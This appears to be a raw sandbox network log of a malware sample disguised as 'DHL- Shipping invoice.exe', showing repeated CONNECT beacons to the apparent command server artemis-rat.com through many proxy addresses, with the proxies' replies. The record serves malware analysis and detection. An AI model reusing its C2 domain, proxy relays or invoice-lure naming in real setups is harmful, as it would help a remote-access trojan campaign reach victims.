                            1192192.168.2.45345138.54.71.67806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.071054935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.476377964 CET176INHTTP/1.1 404 Not Found
                            Content-Type: text/plain; charset=utf-8
                            X-Content-Type-Options: nosniff
                            Date: Tue, 12 Mar 2024 07:37:04 GMT
                            Content-Length: 19
                            Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                            Data Ascii: 404 page not found


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1193192.168.2.45361645.7.177.10522466484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.071325064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1194192.168.2.453636157.185.157.151265896484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.074712038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1195192.168.2.453077189.240.60.16690906484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.082391977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.428311110 CET72INHTTP/1.1 200 Connection established
                            Proxy-Agent: Fortinet-Proxy/1.0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1196192.168.2.45353747.243.92.19931286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.092240095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.401252031 CET38INHTTP/1.1 200 OK
                            content-length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1197192.168.2.453632140.84.169.12531286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.093059063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.562525034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.062805891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.953687906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.766100883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.562771082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.250185966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.750015974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:21.563044071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1198192.168.2.453515114.255.132.6031286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.100905895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:41.594758987 CET1286INHTTP/1.1 503 Service Unavailable
                            Server: squid/3.5.27
                            Mime-Version: 1.0
                            Date: Tue, 12 Mar 2024 07:38:39 GMT
                            Content-Type: text/html;charset=utf-8
                            Content-Length: 3819
                            X-Squid-Error: ERR_DNS_FAIL 0
                            Vary: Accept-Language
                            Content-Language: en
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67
                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2017 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {marg


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1199192.168.2.4537335.161.108.724436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.108268976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1200192.168.2.4537345.161.108.724436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.109697104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1201192.168.2.4537365.161.108.724436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.111876965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1202192.168.2.4537425.161.108.724436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.113960028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1203192.168.2.453639107.173.146.53156736484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.116781950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1204192.168.2.453658185.162.229.215806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.148399115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.236057043 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:04 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1205192.168.2.453638177.234.245.249322136484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.148922920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1206192.168.2.45357720.205.61.143806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.149947882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.449330091 CET319INHTTP/1.1 403 Forbidden
                            Server: squid
                            Mime-Version: 1.0
                            Date: Tue, 12 Mar 2024 07:37:04 GMT
                            Content-Type: text/html;charset=utf-8
                            Content-Length: 17
                            X-Squid-Error: ERR_ACCESS_DENIED 0
                            X-Cache: MISS from cdn-fintech.info
                            X-Cache-Lookup: NONE from cdn-fintech.info:8123
                            Connection: keep-alive
                            Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                            Data Ascii: ERR_ACCESS_DENIED


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1207192.168.2.453559153.99.63.14380006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.164114952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1208192.168.2.451812165.227.196.37537186484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.205589056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.265749931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.266061068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.359456062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:28.453048944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:40.562306881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:52.562275887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:16.564939022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:04.562290907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1209192.168.2.453545175.183.82.22181936484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.214236975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1210192.168.2.45186892.204.135.203292126484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.217032909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.265748024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.266057014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.359455109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:28.452950001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:40.562283993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:52.562253952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:16.562328100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:04.562314987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1211192.168.2.45357627.96.235.171806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.271357059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1212192.168.2.453509103.66.177.17322516484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.274746895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1213192.168.2.453708188.114.99.37806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.280299902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.368007898 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:04 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1214192.168.2.453707104.20.205.191806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.280621052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.368349075 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:04 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
